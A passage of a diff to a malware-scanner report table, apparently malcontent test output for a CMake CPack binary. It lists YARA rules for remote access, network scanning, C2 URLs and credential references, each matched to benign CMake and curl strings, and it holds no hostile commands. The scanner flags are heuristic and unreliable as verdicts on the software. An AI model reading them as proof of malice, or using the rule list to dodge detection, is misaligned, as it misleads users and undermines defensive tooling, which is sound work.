[StartupCommands](https://github.com/search?q=StartupCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | | MEDIUM | [exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null) | runs templated commands, discards output | [%s > /dev/null](https://github.com/search?q=%25s+%3E+%2Fdev%2Fnull&type=code) | @@ -25,7 +25,7 @@ | MEDIUM | [exec/shell/ignore_output](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/ignore_output.yara#ignore_output_val) | Runs shell commands but throws output away | [s > /dev/null 2>&1](https://github.com/search?q=s+%3E+%2Fdev%2Fnull+2%3E%261&type=code) | | MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileSetERKNS](https://github.com/search?q=CreateFileSetERKNS&type=code) | | MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utime](https://github.com/search?q=utime&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/IFW/cmCPack](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FIFW%2FcmCPack&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackArch](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackArch&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackDebG](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackDebG&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackExte](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackExte&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackGene](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackGene&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackInno](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackInno&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackNSIS](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackNSIS&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackNuGe](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackNuGe&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackRPMG](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackRPMG&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackSTGZ](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackSTGZ&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cpack.cxx](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2Fcpack.cxx&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Utilities/cmcurl/lib/vtl](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FUtilities%2Fcmcurl%2Flib%2Fvtl&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/IFW/cmCPack](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FIFW%2FcmCPack&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackArch](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackArch&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackDebG](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackDebG&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackExte](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackExte&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackGene](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackGene&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackInno](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackInno&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackNSIS](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackNSIS&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackNuGe](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackNuGe&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackRPMG](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackRPMG&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cmCPackSTGZ](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2FcmCPackSTGZ&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Utilities/cmcurl/lib/vtl](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FUtilities%2Fcmcurl%2Flib%2Fvtl&type=code)
[/tmp/cmake-20240927-3632-facy7m/cmake-3.30.4/Source/CPack/cpack.cxx](https://github.com/search?q=%2Ftmp%2Fcmake-20240927-3632-facy7m%2Fcmake-3.30.4%2FSource%2FCPack%2Fcpack.cxx&type=code) | | MEDIUM | [fs/path/usr_local](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-local.yara#usr_local_bin_path) | path reference within /usr/local/bin | [/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/stat](https://github.com/search?q=%2Fproc%2F%25d%2Fstat&type=code) | @@ -34,19 +34,19 @@ | MEDIUM | [fs/proc/pid_stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-stat.yara#proc_pid_stat) | access status fields for other processes | [/proc/%d/stat](https://github.com/search?q=%2Fproc%2F%25d%2Fstat&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | listens, uses SOCKS5, and cryptography | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[Target](https://github.com/search?q=Target&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code)
[probe](https://github.com/search?q=probe&type=code)
[Port](https://github.com/search?q=Port&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | -| MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) | -| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code) | +| MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code) | +| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type: application/dns](https://github.com/search?q=Content-Type%3A+application%2Fdns&type=code)
[Content-Type: application/x](https://github.com/search?q=Content-Type%3A+application%2Fx&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | $host_port | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/proxy/socks5](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5) | Supports SOCK5 proxies | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code)
[Proxy](https://github.com/search?q=Proxy&type=code)
[proxy](https://github.com/search?q=proxy&type=code) | | MEDIUM | [net/rpc/ntlm](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/rpc/ntlm.yara#windows_ntlm_auth) | supports Windows NTLM authentication | [NTLM](https://github.com/search?q=NTLM&type=code)
[ntlm](https://github.com/search?q=ntlm&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | @@ -54,11 +54,11 @@ | MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Could not find CMAKE_ROOT !!!](https://github.com/search?q=Could+not+find+CMAKE_ROOT+%21%21%21&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://nsis.sourceforge.net](http://nsis.sourceforge.net)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[https://curl.se/docs/hsts.html](https://curl.se/docs/hsts.html)
[https://curl.se/docs/http](https://curl.se/docs/http)
[https://jrsoftware.org/isinfo.php](https://jrsoftware.org/isinfo.php) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [arm64](https://github.com/search?q=arm64&type=code)
[http://](http://)
[https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Bad password](https://github.com/search?q=Bad+password&type=code)
[No password part in the URL](https://github.com/search?q=No+password+part+in+the+URL&type=code)
[Password](https://github.com/search?q=Password&type=code)
[cannot set user password](https://github.com/search?q=cannot+set+user+password&type=code)
[check password](https://github.com/search?q=check+password&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[https://jrsoftware.org/isinfo.php](https://jrsoftware.org/isinfo.php)
[https://curl.se/docs/hsts.html](https://curl.se/docs/hsts.html)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://nsis.sourceforge.net](http://nsis.sourceforge.net)
[https://curl.se/docs/http](https://curl.se/docs/http) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[arm64](https://github.com/search?q=arm64&type=code)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [No password part in the URL](https://github.com/search?q=No+password+part+in+the+URL&type=code)
[cannot set user password](https://github.com/search?q=cannot+set+user+password&type=code)
[check password](https://github.com/search?q=check+password&type=code)
[Bad password](https://github.com/search?q=Bad+password&type=code)
[Password](https://github.com/search?q=Password&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[aes_encrypt](https://github.com/search?q=aes_encrypt&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [aes_encrypt](https://github.com/search?q=aes_encrypt&type=code)
[AES](https://github.com/search?q=AES&type=code) | | LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [Decryption is unsupport](https://github.com/search?q=Decryption+is+unsupport&type=code) | | LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public Key](https://github.com/search?q=Public+Key&type=code)
[Public key](https://github.com/search?q=Public+key&type=code)
[public key](https://github.com/search?q=public+key&type=code) | | LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLSVersion](https://github.com/search?q=TLSVersion&type=code) | @@ -66,16 +66,16 @@ | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
